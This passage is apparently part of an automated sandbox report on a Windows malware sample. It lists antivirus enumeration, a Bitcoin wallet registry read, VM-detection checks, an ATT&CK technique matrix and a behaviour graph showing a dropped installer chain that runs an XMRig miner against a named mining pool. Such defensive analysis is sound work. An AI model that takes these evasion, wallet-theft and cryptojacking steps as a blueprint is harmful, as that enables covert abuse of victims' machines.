          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1776684809.000002DD74555000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1776684809.000002DD74555000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid Accounts331
          Windows Management Instrumentation
          1
          Scripting
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          OS Credential Dumping1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          PowerShell
          1
          DLL Side-Loading
          1
          Windows Service
          1
          Obfuscated Files or Information
          LSASS Memory233
          System Information Discovery
          Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Windows Service
          411
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager1
          Query Registry
          SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading
          NTDS631
          Security Software Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Modify Registry
          LSA Secrets1
          Process Discovery
          SSHKeylogging3
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts441
          Virtualization/Sandbox Evasion
          Cached Domain Credentials441
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
          Process Injection
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
          System Owner/User Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          Remote System Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611947 Sample: SecuriteInfo.com.Win64.Evo-... Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 88 rx-eu-lon.unminable.com 2->88 90 rx.unmineable.com 2->90 92 4 other IPs or domains 2->92 112 Sigma detected: Xmrig 2->112 114 Suricata IDS alerts for network traffic 2->114 116 Antivirus detection for dropped file 2->116 118 8 other signatures 2->118 15 SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe 3 5 2->15         started        20 regsvr32.exe 2->20         started        signatures3 process4 dnsIp5 100 93.88.203.169, 39001, 49706, 56001 DRAVANET-ASHU Hungary 15->100 66 C:\Users\user\AppData\...\Stamp_Setup.exe, PE32 15->66 dropped 68 C:\Users\user\AppData\...\u9KSgzq29lys.bat, DOS 15->68 dropped 102 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 15->102 104 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->104 106 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->106 110 2 other signatures 15->110 22 cmd.exe 1 15->22         started        108 Suspicious powershell command line found 20->108 25 powershell.exe 20->25         started        file6 signatures7 process8 signatures9 128 Uses ping.exe to sleep 22->128 130 Uses ping.exe to check the status of other devices and networks 22->130 27 Stamp_Setup.exe 2 22->27         started        31 conhost.exe 22->31         started        33 PING.EXE 1 22->33         started        35 chcp.com 1 22->35         started        132 Loading BitLocker PowerShell Module 25->132 37 conhost.exe 25->37         started        process10 file11 78 C:\Users\user\AppData\...\Stamp_Setup.tmp, PE32 27->78 dropped 140 Multi AV Scanner detection for dropped file 27->140 39 Stamp_Setup.tmp 3 6 27->39         started        signatures12 process13 file14 70 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 39->70 dropped 72 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 39->72 dropped 74 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 39->74 dropped 42 Stamp_Setup.exe 2 39->42         started        process15 file16 76 C:\Users\user\AppData\...\Stamp_Setup.tmp, PE32 42->76 dropped 45 Stamp_Setup.tmp 19 8 42->45         started        process17 file18 80 C:\Users\user\AppData\Roaming\is-H1DAG.tmp, PE32+ 45->80 dropped 82 C:\Users\user\AppData\...\9mpr_8.ocx (copy), PE32+ 45->82 dropped 84 C:\Users\user\AppData\...\unins000.exe (copy), PE32 45->84 dropped 86 4 other malicious files 45->86 dropped 48 regsvr32.exe 45->48         started        process19 process20 50 regsvr32.exe 16 2 48->50         started        dnsIp21 94 github.com 140.82.121.4, 443, 65257 GITHUBUS United States 50->94 96 raw.githubusercontent.com 185.199.110.133, 443, 65259 FASTLYUS Netherlands 50->96 120 System process connects to network (likely due to code injection or exploit) 50->120 122 Suspicious powershell command line found 50->122 124 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 50->124 126 4 other signatures 50->126 54 AddInProcess.exe 50->54         started        58 powershell.exe 50->58         started        60 powershell.exe 50->60         started        62 3 other processes 50->62 signatures22 process23 dnsIp24 98 rx-eu-lon.unminable.com 161.35.34.195, 3333, 65269, 65270 DIGITALOCEAN-ASNUS United States 54->98 134 Query firmware table information (likely to detect VMs) 54->134 136 Loading BitLocker PowerShell Module 58->136 64 conhost.exe 58->64         started        signatures25 138 Detected Stratum mining protocol 98->138 process26

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.